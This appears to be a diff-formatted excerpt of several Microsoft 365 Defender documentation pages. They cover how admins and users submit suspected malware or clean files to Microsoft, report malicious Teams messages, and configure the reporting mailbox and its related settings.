-Admins can use the sample submission portal at <https://www.microsoft.com/wdsi/filesubmission> to submit other suspected files to Microsoft for analysis. For more information, see [Submit files for analysis](../defender/submission-guide.md).
-
-> [!TIP]
-> In U.S. Government organizations (Microsoft 365 GCC, GCC High, and DoD), admins can submit messages to Microsoft for analysis. The messages are analyzed for email authentication and policy checks only. Payload reputation, detonation, and grader analysis aren't done for compliance reasons (data isn't allowed to leave the organization boundary). If you report a message, URL, or email attachment to Microsoft from one of these organizations, you get the following message in the result details:
->
-> **Further investigation needed**. Your tenant doesn't allow data to leave the environment, so nothing was found during the initial scan. You'll need to contact Microsoft support to have this item reviewed.
security Submissions Submit Files To Microsoft https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/submissions-submit-files-to-microsoft.md
- Title: Submit malware and good files to Microsoft for analysis
- - NOCSH
----
- - MET150
-
- - m365-security
- - tier1
-description: Admins and end-users can learn about submitting undetected malware or mis-identified malware attachments to Microsoft for analysis.
- Previously updated : 6/20/2023
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Submit malware, non-malware, and other suspicious files to Microsoft for analysis
-
-> [!NOTE]
-> If you're an admin in an organization with Exchange Online mailboxes, we recommend that you use the **Submissions** page in the Microsoft Defender portal to submit messages to Microsoft for analysis. For more information, see [Use the Submissions page to submit suspected spam, phish, URLs, legitimate email getting blocked, and email attachments to Microsoft](submissions-admin.md).
-
-You've probably heard the following best practices for years:
--- Avoid opening messages that look suspicious.-- Never open an attachment from someone you don't know.-- Avoid opening attachments in messages that urge you to open them.-- Avoid opening files downloaded from the internet unless they're from a verified source.-- Don't use anonymous USB drives.-
-But what can you do if you receive a message with a suspicious attachment or have a suspicious file on your system? In these cases, you should submit the suspicious attachment or file to Microsoft. Conversely, if an attachment in an email message or file was incorrectly identified as malware or some other threat, you can submit that, too.
-
-## What do you need to know before you begin?
--- All Microsoft 365 organizations that send or receive email include anti-malware protection that's automatically enabled. For more information, see [Anti-malware protection in EOP](anti-malware-protection-about.md).--- Messages with attachments that contain scripts or other malicious executables are considered malware, and you can use the procedures in this article to report them.--- Messages with links to malicious sites are considered phishing. For more information about reporting phishing and good messages, see [Report messages and files to Microsoft](submissions-report-messages-files-to-microsoft.md).--- Files that block you from your accessing your system and demand money to open them are considered ransomware.-
-## Submit malware files to Microsoft
-
-Organizations that have a Microsoft Defender XDR subscription, or Microsoft Defender XDR for Endpoint Plan 2 can submit files using the **Submissions** page in the Microsoft Defender portal. For more information, see [Use admin submission for submitting files in Microsoft Defender for Endpoint](../defender-endpoint/admin-submissions-mde.md).
-
-Or, you can go to the Microsoft Security Intelligence page at <https://www.microsoft.com/wdsi/filesubmission> to submit the file. To receive analysis updates, sign in or enter a valid email address. We recommend using your Microsoft work or school account.
-
-After you've uploaded the file or files, note the **Submission ID** that's created for your sample submission (for example, `7c6c214b-17d4-4703-860b-7f1e9da03f7f`).
--
-After we receive the sample, we'll investigate. If we determine that the sample file is malicious, we take corrective action to prevent the malware from going undetected.
-
-If you continue receiving infected messages or attachments, then you should copy the message headers from the email message, and contact Microsoft Customer Service and Support for further assistance. Be sure to have your **Submission ID** ready as well.
-
-## Submit good files to Microsoft
-
-Organizations that have a Microsoft Defender XDR Subscription or Microsoft Defender XDR for Endpoint Plan 2 can submit files using the **Submissions** page in the Microsoft Defender portal. For more information, see [Use admin submission for submitting files in Microsoft Defender for Endpoint](../defender-endpoint/admin-submissions-mde.md).
-
-Or, you can go to the Microsoft Security Intelligence page at <https://www.microsoft.com/wdsi/filesubmission> to submit the file. To receive analysis updates, sign in or enter a valid email address. We recommend using your Microsoft work or school account.
-
-You can also submit a file that you believe was incorrectly identified as malware to the website. (Just select **No** for the question **Do you believe this file contains malware?**)
-
-After we receive the sample, we'll investigate. If we determine that the sample file is clean, we take corrective action to prevent the file from being detected as malware.
security Submissions Teams https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/submissions-teams.md
- Title: User reported message settings in Teams
- - NOCSH
----
- - MET150
-
- - m365-security
- - tier1
-
-description: "Admins can configure whether users can report malicious message in Microsoft Teams."
- Previously updated : 3/19/2024
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# User reported message settings in Microsoft Teams
--
-In organizations with Microsoft Defender for Office 365 Plan 2 or Microsoft Defender XDR, admins can decide whether users can report malicious messages in Microsoft Teams. Admins can also get visibility into the Teams messages that users are reporting.
-
-Users can report messages in Teams from **internal** chats, channels and meeting conversations. Users can only report messages as malicious.
-
-> [!NOTE]
-> User reporting of messages in Teams is not supported in U.S. Government organizations (Microsoft 365 GCC, GCC High, and DoD).
->
-> For information about user reporting of email messages, see [Report suspicious email messages to Microsoft](submissions-report-messages-files-to-microsoft.md).
-
-## User reporting settings for Teams messages
-
-User reporting of messages in Teams is made of two separate settings:
--- **In the Teams admin center**: On by default and controls whether users are able to report messages from Teams. When this setting is turned off, users can't report messages within Teams, so the corresponding setting in the Microsoft Defender portal is irrelevant.--- **In the Microsoft Defender portal**: On by default for new tenants. Existing tenants need to enable it. If user reporting of messages is turned on in the Teams admin center, it also needs to be turned on the Defender portal for user reported messages to show up correctly on the **User reported** tab on the **Submissions** page.-
-### Turn off or turn on user reporting in the Teams admin center
-
-To view or configure this setting, you need to be a member of the **Global Administrator** or **Teams Administrator** roles. For more information about permissions in Teams, see [Use Microsoft Teams administrator roles to manage Teams](/microsoftteams/using-admin-roles).
-
-1. In the Teams admin center at <https://admin.teams.microsoft.com>, go to **Messaging policies**. Or, to go directly to the **Messaging policies** page, use <https://admin.teams.microsoft.com/policies/messaging>.
-
-2. On the **Messaging policies** page, verify that the **Manage policies** tab is selected, and do either of the following actions to edit the appropriate policy (the **Global (Org-wide) default** policy or a custom policy):
- - Select the link in the **Name** column.
- - Select the policy by clicking anywhere in the row other than the **Name** column, and then select :::image type="icon" source="../../media/m365-cc-sc-edit-icon.png" border="false"::: **Edit**.
-
-3. In the policy details page that opens, find the **Report a security concern** toggle. By default, it's :::image type="icon" source="../../media/scc-toggle-on.png" border="false"::: **On**. To turn it off, toggle the setting to :::image type="icon" source="../../media/scc-toggle-off.png" border="false"::: **Off**.
-
-4. Select **Save**, and then select **Confirm** in the confirmation dialog that opens.
--
-For more information about messaging policies in Teams, see [Manage messaging policies in Teams](/microsoftteams/messaging-policies-in-teams).
-
-### Turn off or turn on user reporting of Teams messages in the Defender portal
-
-To modify this setting in the Defender portal, you need to be a member of the **Organization Management** or **Security Administrator** role groups. For more information about permissions in the Defender portal, see [Permissions in the Microsoft Defender portal](mdo-portal-permissions.md).
-
-The value of this setting is meaningful only if message reporting is turned on in the Teams admin center as described in the previous section.
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Settings** \> **Email & collaboration** \> **User reported settings** tab. To go directly to the **User reported settings** page, use <https://security.microsoft.com/securitysettings/userSubmission>.
-
-2. On the **User reported settings** page, go to the **Microsoft Teams** section for the **Monitor reported messages in Microsoft Teams** setting.
-
- As previously described, this setting is turned on by default for new tenants, and existing tenants need to enable it. Typically, you leave it turned on if message reporting is also turned on in Teams admin center. [Learn more about reported message destinations](submissions-report-messages-files-to-microsoft.md#report-suspicious-email-messages-to-microsoft).
-
- :::image type="content" source="../../media/submissions-teams-turn-on-off-defender-portal.png" alt-text="Screenshot of the 'Monitor reported messages in Microsoft Teams' setting in the Microsoft Defender portal." lightbox="../../media/submissions-teams-turn-on-off-defender-portal.png":::
-
-For more information about user reported message settings in the Defender portal, see [User reported settings](submissions-user-reported-messages-custom-mailbox.md).
-
-## How users report messages in Teams
-
-1. In the Microsoft Teams client, hover over the malicious message without selecting it, and then select **... More options** \> **More actions** \> **Report this message**.
-
- :::image type="content" source="../../media/submissions-user-report-message-in-teams-client-click-path.png" alt-text="Screenshot of the Select path to report a message in the Microsoft Teams client." lightbox="../../media/submissions-user-report-message-in-teams-client-click-path.png":::
-
-2. In the **report this message** dialog that opens, verify **Security risk - Spam, phishing, malicious content** is selected, and then select **Report**.
-
- :::image type="content" source="../../media/submissions-user-report-message-in-teams-client-click-report.png" alt-text="Screenshot of the final dialog to report a message in the Microsoft Teams client." lightbox="../../media/submissions-user-report-message-in-teams-client-click-report.png":::
-
- > [!NOTE]
- > If [reporting for Microsoft Purview Communication Compliance is turned off](/purview/communication-compliance-policies#user-reported-messages-policy), users might not have the dropdown list to select **Security risk - Spam, phishing, malicious content**. Instead, they're shown a confirmation pop-up.
-
-3. In the confirmation dialog that opens, select **Close**.
-
- > [!NOTE]
- > - The reported message remains visible to the user in the Teams client.
- > - Users can report the same message multiple times.
- > - The message sender isn't notified that messages were reported.
- > - Microsoft also sends an email message notification to the user who reported the message from `submissions@messaging.microsoft.com` with the subject, "You have successfully reported a Teams message as a security risk." If Teams integration is turned on in the Defender portal, admins can customize some elements of the notification message in the **Email notifications** section on **User reported settings** page as described in [Customize the messages used to notify users](submissions-admin-review-user-reported-messages.md#customize-the-messages-used-to-notify-users).
-
-## What happens after a user reports a message from Teams?
-
-What happens to a user reported Teams message depends on the settings in the **Reported message destinations** section on the **User reported settings** page at <https://security.microsoft.com/securitysettings/userSubmission>:
--- **Send the reported messages to** \> **Microsoft and my reporting mailbox**: For Microsoft 365 organizations created after March 1 2023, this is the default value. The default user reporting mailbox is the Exchange Online mailbox of the global admin. The value for older Microsoft 365 organizations is unchanged.-- **Send the reported messages to** \> **Microsoft only**-- **Send the reported messages to** \> **My reporting mailbox only**-
-For more information, see [User reported settings](submissions-user-reported-messages-custom-mailbox.md).
-
-**Notes**:
--- If you select **Send the reported messages to** \> **My reporting mailbox only**, reported messages don't go to Microsoft for analysis unless an admin manually submits the message from the **User reported** tab on the **Submissions** page at <https://security.microsoft.com/reportsubmission?viewid=user>. Reporting messages to Microsoft is an important part of training the service to help improve the accuracy of filtering (reduce false positives and false negatives). That's why we use **Send the reported messages to** \> **Microsoft and my reporting mailbox** as the default.-- Regardless of the **Send the reported messages to** setting, the following actions occur when a user reports a Teams message:
- - Metadata from the reported Teams message (for example, senders, recipients, reported by, and message details) is available on the **User reported** tab on the **Submissions** page.
- - The alert policy named **Teams message reported by user as a security risk** generates an alert by default. For more information, see [Manage alerts](/purview/alert-policies#manage-alerts).
-
- To view the corresponding alert for a user reported message in Teams, go to the **User reported** tab on the **Submission** page, and then double-click the message to open the submission flyout. Select :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More options** and then select **View alert**.
-
-> [!IMPORTANT]
->
-> When a user reports a Teams message to Microsoft, everything associated with the message is copied to include in the continual algorithm reviews. This copy includes the all the data associated with the message, including: message content, headers, any attachments, related data about routing and all other data directly associated with the submission.
->
-> Microsoft treats your feedback as your organization's permission to analyze all the information to fine tune the submission hygiene algorithms. Your message is held in secured and audited data centers in the USA. The submission is deleted as soon as it's no longer required. Microsoft personnel might read your submitted messages and files, which is normally not permitted for Teams messages in Microsoft 365. However, your message is still treated as confidential between you and Microsoft, and your message or file isn't shared with any other party as part of the review process. Microsoft might also use AI to evaluate and create responses tailored to your submissions.
-
-## View and triage user reported messages in Teams
-
-As previously described, information about user reported messages in Teams is available on the **User reported** tab on the **Submissions** page at <https://security.microsoft.com/reportsubmission?viewid=user>. For more information, see [View user reported messages to Microsoft](submissions-admin.md#view-user-reported-messages-to-microsoft).
security Submissions User Reported Messages Custom Mailbox https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/submissions-user-reported-messages-custom-mailbox.md
- Title: User reported settings
- - NOCSH
----
- - MET150
-
- - m365-security
- - tier1
-
-description: "Admins can configure where user reported messages go for analysis: to an internal reporting mailbox, to Microsoft, or both. Other settings complete the reporting experience for users when they report good messages, spam, or phishing messages from Outlook."
- Previously updated : 3/19/2024
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# User reported settings
--
-In Microsoft 365 organizations with Exchange Online mailboxes, you can identify a _reporting mailbox_ (formerly known as a _custom mailbox_ or _submissions mailbox_) to hold messages that users report as malicious or not malicious in Outlook. For Microsoft reporting tools, you can decide whether to send user reported messages to the reporting mailbox, to Microsoft, or to the reporting mailbox and Microsoft. These selections were formerly part of the _User submissions policy_ or _User submissions_.
-
-User reported settings and the reporting mailbox work with the following message reporting tools:
--- [The built-in Report button in Outlook on the web](submissions-outlook-report-messages.md#use-the-built-in-report-button-in-outlook-on-the-web)-- [The Microsoft Report Message or Report Phishing add-ins](submissions-users-report-message-add-in-configure.md)-- [Supported third-party reporting tools](#options-for-third-party-reporting-tools)-
-Delivering user reported messages to a reporting mailbox instead of directly to Microsoft allows admins to selectively and manually submit messages to Microsoft from the **User reported** tab on the **Submissions** page at <https://security.microsoft.com/reportsubmission?viewid=user>. For more information, see [Admin submission](submissions-admin.md).
-
-> [!NOTE]
-> The _ReportJunkEmailEnabled_ parameter on the [Set-OwaMailboxPolicy](/powershell/module/exchange/set-owamailboxpolicy) cmdlet no longer controls whether user message reporting is enabled or disabled. User reporting of messages is now controlled on the **User reported settings** page at <https://security.microsoft.com/securitysettings/userSubmission> as described in this article.
->
-> For information about user reported message settings in Microsoft Teams in Defender for Office 365 Plan 2, see [User reported message settings in Microsoft Teams](submissions-teams.md).
->
-> If the [User reported settings](submissions-user-reported-messages-custom-mailbox.md) in the organization send user reported messages (email and [Microsoft Teams](submissions-teams.md)) to Microsoft (exclusively or in addition to the reporting mailbox), we do the same checks as when admins submit messages to Microsoft for analysis from the **Submissions** page. So, submitting or resubmitting messages to Microsoft is useful to admins only for messages that have never been submitted to Microsoft, or when you disagree with the original verdict.
-
-## Configuration requirements for the reporting mailbox
-
-Before you get started, you need to use the following steps to configure Exchange Online Protection and Defender for Office 365 so user reported messages are delivered to the reporting mailbox without being filtered:
--- Identify the reporting mailbox as a SecOps mailbox. For instructions, see [Use the Microsoft Defender portal to configure SecOps mailboxes in the advanced delivery policy](advanced-delivery-policy-configure.md#use-the-microsoft-defender-portal-to-configure-secops-mailboxes-in-the-advanced-delivery-policy).-
- > [!NOTE]
- > This step is especially important if you use [Attack simulation training](attack-simulation-training-get-started.md) or a third-party product to do phishing simulations. If you don't configure the reporting mailbox as a SecOps mailbox, a user reported message might trigger a training assignment by the phishing simulation product.
--- If you have data loss prevention (DLP), exclude the reporting mailbox from DLP. For more information, see [Data loss prevention Exchange conditions and actions reference](/purview/dlp-exchange-conditions-and-actions).-
-After you verify that the reporting mailbox meets all of these requirements, use the procedures in this article to identify the reporting mailbox and to configure the related settings.
-
-## What do you need to know before you begin?
--- You open the Microsoft Defender portal at <https://security.microsoft.com>. To go directly to the **User reported settings** page, use <https://security.microsoft.com/securitysettings/userSubmission>.--- To connect to Exchange Online PowerShell, see [Connect to Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell).--- You need to be assigned permissions before you can do the procedures in this article. You have the following options:
- - [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell): **Security operations/Security data/Response (manage)** or **Security operations/Security data/Security data basics (read)**.
- - [Email & collaboration permissions in the Microsoft Defender portal](mdo-portal-permissions.md): Membership in the **Organization Management** or **Security Administrator** role groups.
- - [Microsoft Entra permissions](/entra/identity/role-based-access-control/manage-roles-portal): Membership in the **Global Administrator** or **Security Administrator** roles gives users the required permissions _and_ permissions for other features in Microsoft 365.
--- You need access to Exchange Online PowerShell. If your account doesn't have access to Exchange Online PowerShell, you get the following error: *Specify an email address in your domain*. For more information about enabling or disabling access to Exchange Online PowerShell, see the following articles:
- - [Enable or disable access to Exchange Online PowerShell](/powershell/exchange/disable-access-to-exchange-online-powershell)
- - [Client Access Rules in Exchange Online](/exchange/clients-and-mobile-in-exchange-online/client-access-rules/client-access-rules) ([until October 2023](https://techcommunity.microsoft.com/t5/exchange-team-blog/deprecation-of-client-access-rules-in-exchange-online/ba-p/3638563))
-
-## Use the Microsoft Defender portal to configure user reported settings
-
-In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Settings** \> **Email & collaboration** \> **User reported settings** tab. To go directly to the **User reported settings** page, use <https://security.microsoft.com/securitysettings/userSubmission>.
-
-On the **User reported settings** page, the available settings for reporting messages in Outlook are determined by the **Monitor reported messages in Outlook** setting in the **Outlook** section at the top of the page:
--- **Monitor reported messages in Outlook** isn't selected: The Microsoft-integrated reporting experience for email messages is turned off, and all settings related to reporting email messages aren't configurable on the **User reported settings** page, including the ability for users to report email messages from quarantine.--- **Monitor reported messages in Outlook** is selected: The following configurations are supported:-
- - Use the built-in **Report** button in Outlook on the web or the Microsoft Report Message or Report Phishing add-ins in virtually all Outlook platforms to report email messages.
- - Configure user reported messages to go to the reporting mailbox, to Microsoft, or both.
- - Decide whether users receive default or customized pre-reporting and post-reporting pop-ups in supported version of Outlook.
- - Decide whether to customize the feedback email that's sent to users after an admin reviews and marks the message on the **User submissions** tab on the **Submissions** page.
- - Decide whether users can report email messages from quarantine as they release quarantined messages.
-
- For details, see the [Options for Microsoft reporting tools](#options-for-microsoft-reporting-tools) section in this article.
-
- - Use a third-party, non-Microsoft add-in to report email messages.
- - Decide whether users can report email messages from quarantine as they release quarantined messages.
-
- For details, see the [Options for third-party reporting tools](#options-for-third-party-reporting-tools) section in this article.
-
-### Options for Microsoft reporting tools
-
-When **Monitor reported messages in Outlook** is selected and you also select **Use the built-in Report button in Outlook**, the following options are available on the **User reported settings** page:
--- **Outlook** section \> **Select an Outlook report button configuration** section \> **When the user reports an email** section:-
- - **Ask the user to confirm before reporting**: A pre-reporting pop-up is shown in supported versions of Outlook for the following user actions:
- - **Report phishing**
- - **Report junk**
- - **Report not junk**
- - **Show a success message after the message is reported**: A post-reporting pop-up is shown in supported versions of Outlook for the following user actions:
- - **Phishing reported**
- - **Junk reported**
-
- Notification pop-ups contain default English text that's automatically localized for users based on their client language. To customize the pop-up text, you can create custom versions of the five reporting pop-ups in up to seven different languages.
-
- > [!NOTE]
- > Customized pre-reporting and post-reporting pop-ups are shown when using the **Report** button in Outlook on the web.
- >
- > The Microsoft Report Message add-in supports only customized **Title** and **Description** values, and only for pre-reporting pop-ups (**Report phishing**, **Report junk**, and **Report not junk**).
- >
- > The Microsoft Report Phishing add-in supports all customized values, but only for the **Report phishing** pre-reporting pop-up.
-
- To view the default or customized notification pop-ups, select **Customize messages**. The following information is available in the **Customize messages** flyout that opens:
-
- - **Language**: The value **Default** for the default notifications or the language for a custom notification.
- - **Status**: The value is **5 of 5 messages configured** for the default notifications or **n of 5 notifications configured** for custom notifications.
- - **Action**: The **View** link for the default notifications. The **Edit** and **Delete** links for custom notifications.
-
- To create customized pop-up notifications in specific languages, select :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Add customized message**. In the **Add customized message** flyout that opens, configure the following settings:
-
- - Select the tab for the notification pop-up to customize:
- - **Report phishing** (this is the default selection)
- - **Report junk**
- - **Report not junk**
- - **Phishing reported**
- - **Junk reported**
-
- - **Choose language**: The available values are: **Amharic**, **Arabic**, **Bangla (India)**, **Basque**, **Bulgarian**, **Catalan**, **Chinese (Simplified)**, **Croatian**, **Czech**, **Danish**, **Dutch**, **English**, **Estonian**, **Filipino**, **Finnish**, **French**, **Galician**, **German**, **Greek**, **Gujarati**, **Hebrew**, **Hindi**, **Hungarian**, **Icelandic**, **Indonesian**, **Italian**, **Japanese**, **Kannada**, **Kazakh**, **Korean**, **Latvian**, **Lithuanian**, **Malayalam**, **Malayalam**, **Marathi**, **Norwegian**, **Norwegian (Nynorsk)**, **Polish**, **Portuguese**, **Romanian**, **Russian**, **Serbian**, **Slovak**, **Slovenian**, **Spanish**, **Swahili**, **Swedish**, **Tamil**, **Telugu**, **Thai**, **Turkish**, **Ukrainian**, **Urdu**, and **Vietnamese**.
-
- After you select a language, the following settings are available:
-
- - **Title**: Enter a maximum of 50 characters.
- - **Description**: Enter a maximum of 300 characters.
- - **Add a link to more information**: Select the check box and enter values in the following boxes that appear:
- - **Link text**: Enter a maximum of 30 characters.
- - **URL**: Enter the URL.
-
- When you're finished in the **Add customized message** flyout, select **Save** or **Save & apply to all the message types**.
--- **Reported message destinations** section \> **Send the reported messages to**: Select one of the following options:-
- - **Microsoft and my reporting mailbox**: For Microsoft 365 organizations created after March 1 2023, this is the default value. User reported messages go to Microsoft for analysis and to the specified reporting mailbox for an admin or security operations team to analyze.
-
- The default user reporting mailbox is the Exchange Online mailbox of the global admin. Currently, the global admin isn't _shown_ as the user reported mailbox on the **User reported settings** page until _after_ the first user in the organization reports a message from Outlook.
-
- To specify a different mailbox, select :::image type="icon" source="../../media/m365-cc-sc-remove-selection-icon.png" border="false"::: next to any existing entry in the **Add an Exchange Online mailbox to send reported messages to** box. Click in the box and wait for the list of mailboxes to populate, or start typing a value to filter the list, and then select the mailbox in the results. Distribution groups and routing to an external or on-premises mailbox aren't allowed.
-
- - **My reporting mailbox only**: User reported messages go only to the specified reporting mailbox for an admin or the security operations team to analyze.
-
- Follow the previous instructions to select the mailbox in the **Add an Exchange Online mailbox to send reported messages to** box.
-
- On the **User reported** tab on the **Submissions** page at <https://security.microsoft.com/reportsubmission?viewid=user>, the **Result** value for these entries is **Not Submitted to Microsoft**. Messages don't go to Microsoft for analysis unless an admin manually submits the message. For instructions, see [Submit user reported messages to Microsoft for analysis](submissions-admin.md#submit-user-reported-messages-to-microsoft-for-analysis).
-
- - **Microsoft only**: User reported messages go directly to Microsoft for analysis.
-
- > [!NOTE]
- >
- > - When you select **Use the built-in Report button in Outlook** and users report messages using the built-in **Report** button in Outlook on the web or the Microsoft Report Message or Report Phishing add-ins in Outlook, user reported messages are available to admins on the **User reported** tab on the **Submissions** page at <https://security.microsoft.com/reportsubmission?viewid=user>, regardless of the value you select for **Send the reported messages to**. For more information, see [Admin options for user reported messages](submissions-admin.md#admin-options-for-user-reported-messages).
- >
- > - In U.S. Government organizations (Microsoft 365 GCC, GCC High, and DoD), the only available value for **Send the reported messages to** is **My reporting mailbox only**. The other two options are unavailable for compliance reasons (data isn't allowed to leave the organization boundary).
--- **Email notifications** section: These options affect the notification email message that's sent to users when an admin selects :::image type="icon" source="../../media/m365-cc-scc-mark-and-notify-icon.png" border="false"::: **Mark as and notify** on the **Submissions** page at <https://security.microsoft.com/reportsubmission>. The following options are available:-
- - **Results email** section:
- - Select **Customize results email**. In the **Customize admin review email notifications** flyout that opens, configure the following settings on the **Phishing**, **Junk** and **No threats found** tabs:
- - **Email body results text**: Enter the custom text to use. You can use different text for **Phishing**, **Junk** and **No threats found**.
- - **Email footer text**: Enter the custom message footer text to use. The same text is used for **Phishing**, **Junk** and **No threats found**.
-
- When you're finished in the **Customize admin review email notifications** flyout, select **Confirm** to return to the **User reported settings** page.
-
- - **Automatically email users the results of the investigation**: This feature is available only in Defender for Office 365 Plan 2 organizations with [automated investigation and response (AIR)](air-about.md).
-
- > [!NOTE]
- > This feature is currently in Private Preview, isn't available in all organizations, and is subject to change.
-
- If a user reports a message as phishing, an investigation in AIR is automatically created. The following options send notification email to the user who reported the message based on the results from AIR (select one or more options):
-
- - **Phishing or malware**: An email notification is sent to the user who reported the message as phishing when AIR identifies the threat as phishing, high confidence phishing, or malware.
- - **Spam**: An email notification is sent to the user who reported the message as phishing when AIR identifies the threat as spam.
- - **No threats found**: An email notification is sent to the user who reported the message as phishing when AIR identifies no threat.
-
- For more information, see [Automatic user notifications for user reported phishing results in AIR](air-user-automatic-feedback-response.md).
-
- - **Customize sender and branding** section:
- - **Specify a Microsoft 365 mailbox to use ads the From address of email notifications**: Select this option and enter the sender's email address in the box that appears. If you don't select this option, the default sender is submissions@messaging.microsoft.com.
- - **Replace the Microsoft logo with my organization's logo across all reporting experiences**: Select this option to replace the default Microsoft logo that's used in notifications. Before you do this step, follow the instructions in [Customize the Microsoft 365 theme for your organization](/microsoft-365/admin/setup/customize-your-organization-theme) to upload your custom logo.
--- **Report from quarantine** section \> **Allow reporting for quarantined messages**: Verify that this setting is selected to let users report messages from quarantine as they [release quarantined email messages](quarantine-end-user.md#release-quarantined-email). Otherwise, uncheck this setting.-
-When you're finished on the **User reported settings** page, select **Save**.
-
-### Options for third-party reporting tools
-
-If you're using a third-party reporting button for end users (for example, KnowBe4 Phish Alert Button, Cofense Report Phishing, or PhishAlarm), you can benefit from the power of Defender incident management, in-product phishing triage, and native automated response capabilities by integrating the reporting button with Microsoft Defender for Office 365.
-
-When **Monitor reported messages in Outlook** is selected and you also select **Use a non-Microsoft add-in button**, the following options are available on the **User reported settings** page:
--- **Reported message destinations** section \> **Add an Exchange Online mailbox to send reported messages to**: Click in the box to find and select an existing Exchange Online mailbox to use as the reporting mailbox that holds user-reported messages from third-party reporting tools. In organizations with Defender for Office 365 Plan 2, [Automatic investigation and response to threats](air-about.md), is triggered which automatically carries out the analysis and clean up actions for you.-
- Messages can appear on the **User reported settings** tab of the **Submissions** page at <https://security.microsoft.com/reportsubmission?viewid=user>. The **Result** value for these entries is **Not Submitted to Microsoft**. The message formatting requirements are described in the next section.
--- **Report from quarantine** section \> **Allow reporting for quarantined messages**: Verify that this setting is selected to let users report messages from quarantine as they [release quarantined email messages](quarantine-end-user.md#release-quarantined-email). Otherwise, uncheck this setting.-
-When you're finished on the **User reported settings** page, select **Save**.
-
-> [!TIP]
-> If **Monitor reported messages in Microsoft Teams** is selected in the **Microsoft Teams** section when **Use a non-Microsoft add-in button** is also selected, the settings in the **Email notifications** sections are available. But, these settings apply only to user-reported Teams messages. For more information, see [User reported message settings in Microsoft Teams](submissions-teams.md).
-
-#### Message submission format for third-party reporting tools
-
-Messages sent by third-party reporting tools to the reporting mailbox required specific formatting so they're correctly identified on the **User reported** tab on the **Submissions** page at <https://security.microsoft.com/reportsubmission?viewid=user>.
-
-Messages that don't follow the required formatting are always identified as phishing.
-
-To correctly identify why the original messages were reported, messages sent to the reporting mailbox must meet the following criteria:
--- The user reported message is unmodified and is included as an uncompressed .EML or .MSG attachment. Don't forward the original user reported message to the reporting mailbox.-
- > [!CAUTION]
- > Messages that contain multiple attached messages are discarded.
--- The user reported message should contain the following required headers:
- - X-Microsoft-Antispam-Message-Info
- - Message-Id
- - X-Ms-Exchange-Organization-Network-Message-Id
- - X-Ms-Exchange-Crosstenant-Id
-
- > [!NOTE]
- > TenantId in `X-Ms-Exchange-Crosstenant-Id` should be the same as the tenant.
- >
- > `X-Microsoft-Antispam-Message-Info` should be a valid xmi.
--- The Subject line (Envelope Title) of messages sent to the reporting mailbox must start with one of the following prefix values:
- - `1|` or `Junk:`.
- - `2|` or `Not junk:`.
- - `3|` or `Phishing:`.
-
- For example:
-
- - `3|This text in the Subject line is ignored by the system`
- - `Not Junk:This text in the Subject line is also ignored by the system`
-
-## Use Exchange Online PowerShell to configure the reported message settings
-
-After you [connect to Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell), use the **\*-ReportSubmissionPolicy** and **\*-ReportSubmissionRule** cmdlets to manage and configure the user reported settings.
-
-In Exchange Online PowerShell, the basic elements of the user reported settings are:
--- **The report submission policy**: Turns reporting in Outlook on or off, turns sending reported messages to Microsoft on or off, turns sending reported messages to the reporting mailbox on or off, and most other settings.-- **The report submission rule**: Specifies the email address of the reporting mailbox or a blank value when the reporting mailbox isn't used (report messages to Microsoft only).-
-The difference between these two elements isn't obvious when you manage the user reported settings in the Microsoft Defender portal:
--- An organization has one report submission policy and one report submission rule.-
- If you never opened the **User reported settings** page at <https://security.microsoft.com/securitysettings/userSubmission>, there's no report submission policy or report submission rule (the **Get-ReportSubmissionPolicy** and **Get-ReportSubmissionRule** cmdlets return nothing).
-
- After you visit the **User reported settings** page for the first time (even if you don't change any settings), the report submission policy named DefaultReportSubmissionPolicy is created with the default values and is visible in PowerShell.
-
- Only after you specify a reporting mailbox (used by Microsoft or third-party reporting tools) and save the changes on the **User reported settings page** is the report submission rule named DefaultReportSubmissionRule created. It might take several seconds before the rule is visible in PowerShell.
-
- > [!NOTE]
- > The default settings on the **User reported settings** page include **Send reported messages to** \> **Microsoft and my reporting mailbox** with a blank value for the reporting mailbox. In PowerShell, there's no report submission rule. This default configuration means the reporting mailbox is the global admin's Exchange Online mailbox. The global admin isn't _shown_ as the reporting mailbox in the output of the **Get-ReportSubmissionPolicy** and **Get-ReportSubmissionRule** cmdlets or on the **User reported settings** page until _after_ the first user in the organization reports a message from Outlook. [Learn more about what Microsoft does to your submitted messages](submissions-report-messages-files-to-microsoft.md#report-suspicious-email-messages-to-microsoft).
